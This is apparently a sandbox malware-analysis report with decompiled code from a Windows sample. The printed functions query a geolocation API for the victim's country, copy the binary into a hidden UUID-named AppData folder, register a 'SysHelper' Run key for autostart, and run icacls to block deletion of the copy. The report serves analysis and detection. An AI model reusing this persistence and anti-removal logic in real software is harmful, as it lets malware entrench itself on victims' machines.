0x0040d0f6
0x0040d0f9
0x0040d0fb
0x0040d105
0x0040d10f
0x0040d119
0x0040d123
0x0040d12d
0x0040d134
0x0040d13b
0x0040d142
0x0040d149
0x0040d150
0x0040d150
0x0040d15a
0x0040d160
0x0040d162
0x0040d162
0x0040d165
0x0040d165
0x0040d167
0x0040d168
0x0040d16c
0x0040d15c
0x0040d15c
0x0040d15c
0x0040d177
0x0040d17d
0x0040d181
0x0040d186
0x0040d18b
0x00000000
0x0040d1c7
0x0040d1c7
0x0040d1c7
0x0040d1a2
0x0040d1a6
0x0040d1ab
0x0040d1b0
0x0040d1b0
0x0040d1b3
0x0040d1ba
0x0040d1c1
0x00000000
0x0040d19a
0x0040d19a
0x0040d19b
0x0040d1a0
0x00000000
0x0040d1a0
0x0040d0e1
0x0040d1cd
0x0040d1d1
0x0040d1d6
0x0040d1db
0x0040d1db
0x0040d1e2
0x0040d1e9
0x0040d1f0
0x0040d1f4
0x0040d1f9
0x0040d1fe
0x0040d1fe
0x0040d201
0x0040d208
0x0040d20f
0x0040cfb2
0x0040cfb2
0x0040cfb2
0x0040d217
0x0040d21c
0x0040d221
0x0040d22b
0x0040d236

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

Microsoft Internet Explorer, xrefs: 0040CF5A
"country_code":", xrefs: 0040CFE1
https://api.2ip.ua/geo.json, xrefs: 0040CF79

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v16;
				WCHAR* _v24;
				void* _v28;
				void* _v32;
				int _v36;
				intOrPtr _v40;
				WCHAR* _v44;
				char _v60;
				int _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				int _v92;
				intOrPtr _v96;
				WCHAR* _v100;
				char _v116;
				intOrPtr _v120;
				char _v140;
				struct _PROCESS_INFORMATION _v156;
				char _v172;
				struct _STARTUPINFOW _v248;
				short _v2296;
				char _v4342;
				short _v4344;
				char _v6390;
				char _v6392;
				short _v8440;
				short _v12536;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t124;
				intOrPtr _t133;
				_Unknown_base(*)()* _t137;
				short _t150;
				intOrPtr _t160;
				long _t171;
				int _t202;
				intOrPtr _t207;
				void* _t213;
				void* _t221;
				intOrPtr* _t223;
				signed int _t225;
				WCHAR* _t228;
				signed int _t230;
				intOrPtr* _t232;
				signed int _t234;
				intOrPtr* _t237;
				signed int _t239;
				intOrPtr _t242;
				void* _t245;
				WCHAR* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				void* _t253;
				void* _t257;
				intOrPtr _t263;
				void* _t264;
				void* _t266;

				_t221 = __ebx;
				_push(0xffffffff);
				_push(0x4cac68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t263;
				E0042F7C0(0x30e8);
				_push(_t253);
				_v32 = 0;
				_t250 = __edx; // executed
				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32); // executed
				if(_t124 != 0) {
					L50:
					 *[fs:0x0] = _v16;
					return _t124;
				}
				_v6392 = _t124;
				_v36 = 1;
				E0042B420( &_v6390, _t124, 0x7fe);
				_t264 = _t263 + 0xc;
				_v64 = 0x400;
				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64); // executed
				RegCloseKey(_v32);
				_v40 = 7;
				_v44 = 0;
				_v60 = 0;
				if(_v6392 != 0) {
					_t223 =  &_v6392;
					_t245 = _t223 + 2;
					do {
						_t133 =  *_t223;
						_t223 = _t223 + 2;
					} while (_t133 != 0);
					_t225 = _t223 - _t245 >> 1;
					L6:
					_push(_t225);
					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
					_v8 = 0;
					_t255 = _v44;
					if(_v44 == 0) {
						L19:
						_v8 = 0xffffffff;
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
						_t256 = _t137;
						_v92 = 0;
						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
						_v36 = PathFindFileNameW( &_v8440);
						 *_t137(0, 0x1c, 0, 0,  &_v2296);
						__imp__UuidCreate( &_v172);
						_v24 = 0;
						__imp__UuidToStringW( &_v172,  &_v24);
						_t246 = _v24;
						_v96 = 7;
						_v100 = 0;
						_v116 = 0;
						if( *_t246 != 0) {
							_t228 = _t246;
							_t57 =  &(_t228[1]); // 0x2
							_t256 = _t57;
							do {
								_t150 =  *_t228;
								_t228 =  &(_t228[1]);
							} while (_t150 != 0);
							_t230 = _t228 - _t256 >> 1;
							goto L26;
						} else {
							_t230 = 0;
							L26:
							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
							_v8 = 1;
							__imp__RpcStringFreeW( &_v24, _t230);
							_t257 = PathAppendW;
							_t154 =  >=  ? _v116 :  &_v116;
							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
							CreateDirectoryW( &_v2296, 0); // executed
							if(_t250 == 0) {
								L33:
								_v68 = 7;
								_v72 = 0;
								_v88 = 0;
								if(_v2296 != 0) {
									_t232 =  &_v2296;
									_t247 = _t232 + 2;
									do {
										_t160 =  *_t232;
										_t232 = _t232 + 2;
									} while (_t160 != 0);
									_t234 = _t232 - _t247 >> 1;
									L38:
									_push(_t234);
									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
									_v8 = 2;
									PathAppendW( &_v2296, _v36);
									DeleteFileW( &_v2296); // executed
									CopyFileW( &_v8440,  &_v2296, 0); // executed
									_v28 = 0;
									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28); // executed
									if(_t171 != 0) {
										L45:
										if(_v68 >= 8) {
											L00422587(_v88);
											_t264 = _t264 + 4;
										}
										_t124 = 0;
										_v68 = 7;
										_v72 = 0;
										_v88 = 0;
										if(_v96 >= 8) {
											_push(_v116);
											L49:
											_t124 = L00422587();
										}
										goto L50;
									}
									_v4344 = _t171;
									E0042B420( &_v4342, _t171, 0x7fe);
									_t266 = _t264 + 0xc;
									lstrcpyW( &_v4344, "\"");
									lstrcatW( &_v4344,  &_v2296);
									lstrcatW( &_v4344, L"\" --AutoStart");
									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183); // executed
									RegCloseKey(_v28);
									_t236 = _a4;
									if(_a4 != 0) {
										E00413260(_t236, lstrcpyW,  &_v2296);
									}
									E0042B420( &_v248, 0, 0x44);
									_t264 = _t266 + 0xc;
									_v248.cb = 0x44;
									_v248.dwFlags = 1;
									_v248.wShowWindow = 0;
									SetLastError(0);
									lstrcpyW( &_v12536, L"icacls \"");
									_t194 =  >=  ? _v88 :  &_v88;
									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
									_t202 = CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156); // executed
									if(_t202 != 0) {
										do {
										} while (WaitForSingleObject(_v156, 1) == 0x102);
									} else {
										GetLastError();
									}
									goto L45;
								}
								_t234 = 0;
								goto L38;
							}
							if(_v2296 != 0) {
								_t237 =  &_v2296;
								_t68 = _t237 + 2; // 0x2
								_t248 = _t68;
								do {
									_t207 =  *_t237;
									_t237 = _t237 + 2;
								} while (_t207 != 0);
								_t239 = _t237 - _t248 >> 1;
								L32:
								_push(_t239);
								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
								goto L33;
							}
							_t239 = 0;
							goto L32;
						}
					}
					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
					_t262 = _t213;
					if( &_v60 != _t213) {
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_v40 = 7;
						_v44 = 0;
						_v60 = 0;
						E004145A0( &_v60, _t262);
					}
					if(_v120 >= 8) {
						L00422587(_v140);
						_t264 = _t264 + 4;
					}
					_t216 =  >=  ? _v60 :  &_v60;
					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60);
					if(_t124 == 0) {
						goto L19;
					} else {
						_t242 = _a4;
						if(_t242 != 0) {
							_t124 =  &_v60;
							if(_t242 != _t124) {
								_push(0xffffffff);
								_t124 = E00414690(_t221, _t242, _t124, 0);
							}
						}
						if(_v40 < 8) {
							goto L50;
						} else {
							_push(_v60);
							goto L49;
						}
					}
				}
				_t225 = 0;
				goto L6;
			}

0x00411cd0
0x00411cd9
0x00411cdb
0x00411ce0
0x00411ce6
0x00411ced
0x00411cf2
0x00411cf7
0x00411d10
0x00411d12
0x00411d1a
0x00412207
0x0041220b
0x00412216
0x00412216
0x00411d26
0x00411d34
0x00411d3b
0x00411d40
0x00411d43
0x00411d63
0x00411d6c
0x00411d74
0x00411d7b
0x00411d82
0x00411d8d
0x00411d93
0x00411d99
0x00411da0
0x00411da0
0x00411da3
0x00411da6
0x00411dad
0x00411daf
0x00411daf
0x00411dba
0x00411dbf
0x00411dc6
0x00411dcb
0x00411e7c
0x00411e7c
0x00411e87
0x00411e8c
0x00411e91
0x00411e91
0x00411ea5
0x00411eab
0x00411ead
0x00411ece
0x00411ee1
0x00411ef3
0x00411efc
0x00411f05
0x00411f14
0x00411f1a
0x00411f1f
0x00411f26
0x00411f2d
0x00411f34
0x00411f3a
0x00411f3c
0x00411f3c
0x00411f40
0x00411f40
0x00411f43
0x00411f46
0x00411f4d
0x00000000
0x00411f36
0x00411f36
0x00411f4f
0x00411f54
0x00411f5c
0x00411f64
0x00411f71
0x00411f77
0x00411f83
0x00411f8e
0x00411f96
0x00411fce
0x00411fd0
0x00411fd7
0x00411fde
0x00411fe9
0x00411fef
0x00411ff5
0x00412000
0x00412000
0x00412003
0x00412006
0x0041200d
0x0041200f
0x0041200f
0x0041201a
0x0041201f
0x0041202d
0x00412036
0x0041204c
0x00412055
0x0041206e
0x00412076
0x004121d1
0x004121d5
0x004121da
0x004121df
0x004121df
0x004121e2
0x004121e4
0x004121ef
0x004121f6
0x004121fa
0x004121fc
0x004121ff
0x004121ff
0x00412204
0x00000000
0x004121fa
0x00412082
0x00412090
0x004120a1
0x004120aa
0x004120c0
0x004120ce
0x004120f3
0x004120fc
0x00412102
0x00412107
0x00412110
0x00412110
0x00412120
0x00412125
0x00412128
0x00412134
0x0041213e
0x00412146
0x00412158
0x00412161
0x0041216d
0x0041217b
0x004121a0
0x004121a8
0x004121c0
0x004121ca
0x004121aa
0x004121aa
0x004121aa
0x00000000
0x004121a8
0x00411feb
0x00000000
0x00411feb
0x00411fa0
0x00411fa6
0x00411fac
0x00411fac
0x00411fb0
0x00411fb0
0x00411fb3
0x00411fb6
0x00411fbd
0x00411fbf
0x00411fbf
0x00411fc9
0x00000000
0x00411fc9
0x00411fa2
0x00000000
0x00411fa2
0x00411f34
0x00411dec
0x00411df1
0x00411df8
0x00411dfe
0x00411e03
0x00411e08
0x00411e08
0x00411e0d
0x00411e18
0x00411e1f
0x00411e23
0x00411e23
0x00411e2c
0x00411e34
0x00411e39
0x00411e39
0x00411e43
0x00411e48
0x00411e50
0x00000000
0x00411e52
0x00411e52
0x00411e57
0x00411e59
0x00411e5e
0x00411e60
0x00411e65
0x00411e65
0x00411e5e
0x00411e6e
0x00000000
0x00411e74
0x00411e74
0x00000000
0x00411e74
0x00411e6e
0x00411e50
0x00411d8f
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32 ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32 ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32 ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

SHGetFolderPathW, xrefs: 00411E9F
Shell32.dll, xrefs: 00411E94
D, xrefs: 00412128
" --AutoStart, xrefs: 004120C2
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
icacls ", xrefs: 0041214C
SysHelper, xrefs: 00411D5B, 004120EB
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
" --AutoStart, xrefs: 00411DD1

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00423576(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t81;
				signed int _t83;
				void* _t84;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				void* _t94;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				void* _t106;
				signed int _t108;
				void* _t109;
				signed int _t111;
				signed int _t117;
				signed int _t126;
				signed int _t132;
				signed int* _t135;
				signed int _t139;
				signed int _t141;
				void* _t143;
				void* _t155;
				signed int _t158;
				signed int _t167;
				signed int* _t171;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr _t180;
				signed int _t182;
				void* _t184;
				void* _t186;
				signed int _t187;
				signed int _t188;

				_t167 = __edx;
				_t171 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t195 = _t171;
				if(_t171 != 0) {
					E0042B420(_t171, 0xff, 0x24);
					_t177 = _a8;
					__eflags = _t177;
					if(__eflags == 0) {
						goto L1;
					} else {
						__eflags =  *(_t177 + 4);
						if(__eflags > 0) {
							L9:
							_t84 = 7;
							__eflags =  *(_t177 + 4) - _t84;
							if(__eflags < 0) {
								L12:
								E0042FB64(0, _t167, _t171, _t177, __eflags); // executed
								_t87 = E0042F803( &_v12);
								__eflags = _t87;
								if(_t87 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E004242FD(0, _t167);
									asm("int3");
									_push(_t177);
									_t180 = _v52;
									_t89 =  *(_t180 + 0xc);
									__eflags = _t89 & 0x00000083;
									if(__eflags != 0) {
										_push(0);
										_t139 = _a8;
										 *(_t180 + 0xc) = _t89 & 0xffffffef;
										_push(_t171);
										__eflags = _t139 - 1;
										if(_t139 != 1) {
											_t173 = _a4;
										} else {
											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
											_t139 = 0;
										}
										E0042836B(_t167, _t180);
										_t92 =  *(_t180 + 0xc);
										__eflags = _t92;
										if(_t92 >= 0) {
											__eflags = _t92 & 0x00000001;
											if((_t92 & 0x00000001) != 0) {
												__eflags = _t92 & 0x00000008;
												if((_t92 & 0x00000008) != 0) {
													__eflags = _t92 & 0x00000400;
													if((_t92 & 0x00000400) == 0) {
														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
													}
												}
											}
										} else {
											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
										}
										_push(_t139);
										_push(_t173);
										_push(E0042816B(_t180));
										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
										__eflags = _t94 - 0xffffffff;
										_t78 = _t94 != 0xffffffff;
										__eflags = _t78;
										_t79 = (0 | _t78) - 1; // -1
										_t95 = _t79;
									} else {
										_t98 = E00425208(__eflags);
										 *_t98 = 0x16;
										_t95 = _t98 | 0xffffffff;
									}
									return _t95;
								} else {
									_t100 = E0042F82D( &_v16);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L45;
									} else {
										_t102 = E0042F857( &_v8);
										__eflags = _t102;
										if(_t102 != 0) {
											goto L45;
										} else {
											_t11 = _t177 + 4; // 0x858d0050
											_t141 =  *_t11;
											_t155 =  *_t177;
											__eflags = _t141;
											if(__eflags < 0) {
												L23:
												_t83 = E0042F939(_t171, _t177);
												__eflags = _t83;
												if(_t83 == 0) {
													__eflags = _v12 - _t83;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t182 = _t167;
														asm("cdq");
														_t143 =  *_t171 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t171);
														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
														__eflags = _t126;
														if(_t126 == 0) {
															goto L27;
														} else {
															asm("cdq");
															_t171[8] = 1;
															asm("cdq");
															_t143 =  *_t171 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t167;
															_t182 = _t167;
														}
													}
													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
													 *_t171 = _t105;
													__eflags = _t105;
													if(_t105 < 0) {
														_t143 = _t143 + 0xffffffc4;
														 *_t171 = _t105 + 0x3c;
														asm("adc esi, 0xffffffff");
													}
													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
													_t144 = _t167;
													asm("cdq");
													_t184 = _t106 + _t171[1];
													asm("adc ebx, edx");
													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
													_t171[1] = _t108;
													__eflags = _t108;
													if(_t108 < 0) {
														_t184 = _t184 + 0xffffffc4;
														_t171[1] = _t108 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
													_t145 = _t167;
													asm("cdq");
													_t186 = _t109 + _t171[2];
													asm("adc ebx, edx");
													_t111 = E004305A0(_t186, _t167, 0x18, 0);
													_t171[2] = _t111;
													__eflags = _t111;
													if(_t111 < 0) {
														_t186 = _t186 + 0xffffffe8;
														_t171[2] = _t111 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t158 = E004304F0(_t186, _t145, 0x18, 0);
													__eflags = _t167;
													if(__eflags < 0) {
														L43:
														_t171[3] = _t171[3] + _t158;
														asm("cdq");
														_t187 = 7;
														_t117 = _t171[3];
														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
														__eflags = _t117;
														if(_t117 > 0) {
															goto L38;
														} else {
															_t171[4] = 0xb;
															_t171[3] = _t117 + 0x1f;
															_t55 = _t158 + 0x16d; // 0x16d
															_t171[7] = _t171[7] + _t55;
															_t171[5] = _t171[5] - 1;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t188 = 7;
															_t39 =  &(_t171[3]);
															 *_t39 = _t171[3] + _t158;
															__eflags =  *_t39;
															_t171[6] = (_t171[6] + _t158) % _t188;
															L38:
															_t42 =  &(_t171[7]);
															 *_t42 = _t171[7] + _t158;
															__eflags =  *_t42;
														} else {
															__eflags = _t158;
															if(_t158 == 0) {
																__eflags = _t167;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t158;
																		if(_t158 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t155 - _v8;
													_v20 = _t141;
													_t83 = E0042F939(_t171,  &_v24);
													__eflags = _t83;
													if(_t83 == 0) {
														__eflags = _v12 - _t83;
														if(__eflags == 0) {
															L39:
															_t83 = 0;
														} else {
															_push(_t171);
															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
															__eflags = _t132;
															if(_t132 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t83 = E0042F939(_t171,  &_v24);
																__eflags = _t83;
																if(_t83 == 0) {
																	_t171[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t155 - 0x3f480;
													if(_t155 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t177 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t135 = E00425208(__eflags);
								_t178 = 0x16;
								 *_t135 = _t178;
								goto L2;
							} else {
								__eflags =  *_t177;
								if(__eflags >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t81 = E00425208(_t195);
					_t178 = 0x16;
					 *_t81 = _t178;
					E004242D2();
					L2:
					_t83 = _t178;
					L3:
					return _t83;
				}
			}

0x00423576
0x00423581
0x00423584
0x00423587
0x0042358a
0x0042358d
0x0042358f
0x004235b1
0x004235b6
0x004235bc
0x004235be
0x00000000
0x004235c0
0x004235c0
0x004235c3
0x004235d7
0x004235d9
0x004235da
0x004235dd
0x004235e9
0x004235e9
0x004235f2
0x004235f8
0x004235fa
0x004237e5
0x004237e5
0x004237e6
0x004237e7
0x004237e8
0x004237e9
0x004237ea
0x004237ef
0x004237f3
0x004237f4
0x004237f7
0x004237fa
0x004237fc
0x0042380e
0x0042380f
0x00423815
0x00423818
0x00423819
0x0042381c
0x0042382e
0x0042381e
0x00423827
0x00423829
0x0042382b
0x00423832
0x00423837
0x0042383b
0x0042383d
0x00423847
0x00423849
0x0042384b
0x0042384d
0x0042384f
0x00423854
0x00423856
0x00423856
0x00423854
0x0042384d
0x0042383f
0x00423842
0x00423842
0x0042385d
0x0042385e
0x00423866
0x00423867
0x00423871
0x00423874
0x00423874
0x00423879
0x00423879
0x004237fe
0x004237fe
0x00423803
0x00423809
0x00423809
0x0042387e
0x00423600
0x00423604
0x0042360a
0x0042360c
0x00000000
0x00423612
0x00423616
0x0042361c
0x0042361e
0x00000000
0x00423624
0x00423624
0x00423624
0x00423627
0x00423629
0x0042362b
0x0042369b
0x0042369d
0x004236a4
0x004236a6
0x004236ac
0x004236af
0x004236de
0x004236e0
0x004236e3
0x004236e8
0x004236e9
0x004236eb
0x004236b1
0x004236b1
0x004236b2
0x004236b8
0x004236ba
0x00000000
0x004236bc
0x004236c2
0x004236c5
0x004236d0
0x004236d3
0x004236d5
0x004236d7
0x004236da
0x004236da
0x004236ba
0x004236f3
0x004236f8
0x004236fa
0x004236fc
0x00423701
0x00423704
0x00423706
0x00423706
0x0042370f
0x00423716
0x0042371b
0x0042371c
0x00423722
0x00423726
0x0042372b
0x0042372e
0x00423730
0x00423735
0x00423738
0x0042373b
0x0042373b
0x00423744
0x0042374b
0x00423750
0x00423751
0x00423757
0x0042375b
0x00423760
0x00423763
0x00423765
0x0042376a
0x0042376d
0x00423770
0x00423770
0x0042377e
0x00423780
0x00423782
0x004237af
0x004237b5
0x004237bc
0x004237bd
0x004237c0
0x004237c3
0x004237c6
0x004237c8
0x00000000
0x004237ca
0x004237cd
0x004237d4
0x004237d7
0x004237dd
0x004237e0
0x004237e0
0x00423784
0x00423784
0x0042378a
0x00423791
0x00423792
0x00423795
0x00423795
0x00423795
0x00423798
0x0042379b
0x0042379b
0x0042379b
0x0042379b
0x00423786
0x00423786
0x00423788
0x004237a5
0x004237a7
0x004237a9
0x00000000
0x004237ab
0x004237ab
0x004237ad
0x00000000
0x00000000
0x004237ad
0x004237a9
0x00000000
0x00000000
0x00000000
0x00423788
0x00423784
0x00000000
0x00423782
0x0042362d
0x0042362d
0x00423637
0x0042363a
0x00423641
0x00423643
0x00423647
0x0042364a
0x00423651
0x00423653
0x00423659
0x0042365c
0x0042379e
0x0042379e
0x00423662
0x00423662
0x00423663
0x00423669
0x0042366b
0x00000000
0x00423671
0x00423674
0x00423675
0x0042367c
0x00423680
0x00423687
0x00423689
0x0042368f
0x00000000
0x0042368f
0x00423689
0x0042366b
0x0042365c
0x0042362f
0x0042362f
0x00423635
0x00000000
0x00000000
0x00000000
0x00000000
0x00423635
0x0042362d
0x00000000
0x0042362b
0x0042361e
0x0042360c
0x004235df
0x004235df
0x00000000
0x004235e1
0x004235e1
0x004235e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004235e7
0x004235df
0x004235c5
0x004235c5
0x004235cb
0x004235cb
0x004235d2
0x004235d3
0x00000000
0x004235c7
0x004235c7
0x004235c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004235c9
0x004235c5
0x004235c3
0x00423591
0x00423591
0x00423591
0x00423598
0x00423599
0x0042359b
0x004235a0
0x004235a0
0x004235a2
0x004235a8
0x004235a8

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
